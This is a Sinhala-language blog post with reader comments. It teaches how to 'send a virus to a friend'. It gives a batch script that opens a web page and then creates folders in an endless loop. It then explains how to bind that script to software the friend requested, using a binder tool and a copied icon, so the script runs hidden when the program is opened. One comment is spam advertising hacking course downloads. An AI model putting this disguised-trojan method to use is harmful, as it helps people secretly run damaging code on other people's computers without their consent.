WHAT'S NEW?
Loading...

නියම ක්‍රමේට යාලුවට Virus යවන්නෙ මෙහෙමයි

ඉතින් යාලුවනේ අද අරන් ආවෙ මන් නියම පොස්ට් එකක්. අපි හැමදාම ගේන්නෙ නියම පොස්ට් තමා ඒක එනම කතාවක්. කතා නැතුව අපි වැඩේට බහිමු. අද මන් කියල දෙන්නෙ උඩ කියල තියන විදිහට නියම ක්‍රමේට යාලුවට Virus යවන්න පොඩි වැඩ කෑල්ලක්. ගොඩක් අය notepad tricks, batch file tricks, vbs scripts කියල දුන්නට ඒව තව කාගෙ computer එක්ක run කරවල පොඩි ආතල් එකක් ගන්න කියල දෙන් නෑනෙ. ඒව කියල දෙන්න ඉන්නෙ ඉතින් IT දැනුම බෙදාගමු™ අපේ crew එකම තමා.

notepad tricks, batch file tricks, vbs scripts වලින් virus හදන හැටි දැන් මන් කියල දෙන් නෑ. මොකද කලින් මන් ගොඩක් දේවල් කියල දුන්න ඒ සම්බන්ධව. ඒ නිසා  මන් ඔයාලට එවාගෙ link පහලින් දාන්නම්.

හරි දැන් අපි අද කරන්න ආපු වැඩේට බහිමු. මේකට අපි පොඩි බඩු ටිකක් උවමනා වෙනව.
  1. ඉහත තියන virus script වලින් එකක්. (notepad tricks, batch file tricks, vbs scripts)
  2. පොඩි software එකක්. (file එක bind කරන්න යාලුව ඉල්ලුව software එකක්නම් හොදයි. එතකොට මේක අනිව එයා run කරනවනේ.)
  3. icon එකක්. (ඔයාල virus එක යවන්න බාවිතා කරන software එකේ icon එක download කරගන්න ඕනෙ - https://www.iconfinder.com/)
  4. Easy Binder කියන software එක. (Use our download manager and get recommended downloads කියන තැන tick එක අයින් කරල download කරගන්න. Size: 930.87 KB)

හරි දැන් මේව ලෑස්තිනම් අපි වැඩේ පටන් ගමු. අපි උදාහරණයක් විදියට Folder ගොඩක් හැදෙන script එක ගමු. notepad එකකට මේ code එක අපි මුලින්ම copy කරගන්න ඕනෙ.

start http://itdanuma.com
@echo off
:top
md %random%
goto top

පසුව මෙය .bat විදිහට save කරගන්න ඕනෙ. (උ.දා folder10000.bat) මතක ඇතුව Save as Type එක All file දෙන්න.

හරි දැන් අපේ virus script එක ලෑස්තියි. දැන් අපි කරන්න ඕනෙ අපේ යාලුවට අපි දෙන software එකත් එක්ක මේක bind කරන එක. මේකට තමා අපි Easy Binder කියන software එක යොදා ගන්නෙ.

IT දැනුම බෙදාගමු™

දැන් ඉහත රූපයෙ ආකාරයට වින්ඩෝවක් ඔබට ලැබෙයි. මෙහි යටම පලවෙනි button එකෙන් ගොස් අපි තෝරාගත් software එක හා අපි හදපු virus script එක තෝරා ගන්න ඕනෙ.

පසුව මෙහි Settings tab එකට යන්න ඕනෙ.


මෙහි Select An Icon තැනට ගොස් අපි බා ගත් Icon එකත් තෝරල දෙන්න ඕනෙ. output folder එකත් දෙන්න. ඊට පස්සෙ Bind Files යන්න click කරන්න. දැන් අපේ file ටික ලස්සනට bind වෙයි.


දැන් අපේ virus ගිල්ලපු software එක ලෑස්තියි. අපිට තියෙන්නෙ මේක යාලුවට දෙන්න විතරයි. open කරපු ගමන් යටින් virus එක run වෙනව. පට්ට පට පට කිවුවලු.....

අපි මේකට use කරපු script එක වෙනුවට ඔයාලට වෙන virus එකක් යොදා ගන්නත් පුලුවන්.....

තෑගි තෑගි තෑගි - මාසයේ හොදම ප්‍රේක්ෂකයාට අපෙන් තෑගි


අපිට Like එකක් දාන්න අමතක කරන්න එපා.

6 comments: Leave Your Comments

  1. Hodai hodai karala balanna one

    ReplyDelete
  2. elakiri admin
    habai mewa vadiya danda epa..ape aun gana dannawa ne ithin

    ReplyDelete
  3. Hey Guys Today I'm Going to Give Ethical Hacking Full Course Video Tutorial...This Video Pack Have a Full Ec-council CEH Course Video Tutorial...and Other Ethical Hacking Videos..Don't Want to Doing Ethical Hacking Courses. You Can Study Alone Using This Full Course Video Tutorial..

    •DDos Attack
    •Sniffing
    •MITM HIjacking
    •Penetration Attack
    •Buffer Over Flow
    •Telnet Attack
    •Introduction to Ethical Hacking
    •Footprinting and Reconnaissance
    • Scanning Networks
    • Enumeration
    • System Hacking
    • Trojans and Backdoors
    • Viruses and Worms
    • Sniffers
    • Social Engineering
    • Denial of Service
    • Session Hijacking
    • Hacking Webservers
    • Hacking Web Applications
    • SQL Injection
    • Hacking Wireless Networks
    • Hacking Mobile Platforms
    • Evading IDS, Firewalls, and Honeypots
    • Buffer Overflow
    • Cryptography
    • Penetration Testing
    go to my website and download it...this is a best chance for you!!!

    http://sinhasenawa.blogspot.com/2014/09/...ate=803947

    ReplyDelete
  4. Mamath karala beluwa

    ReplyDelete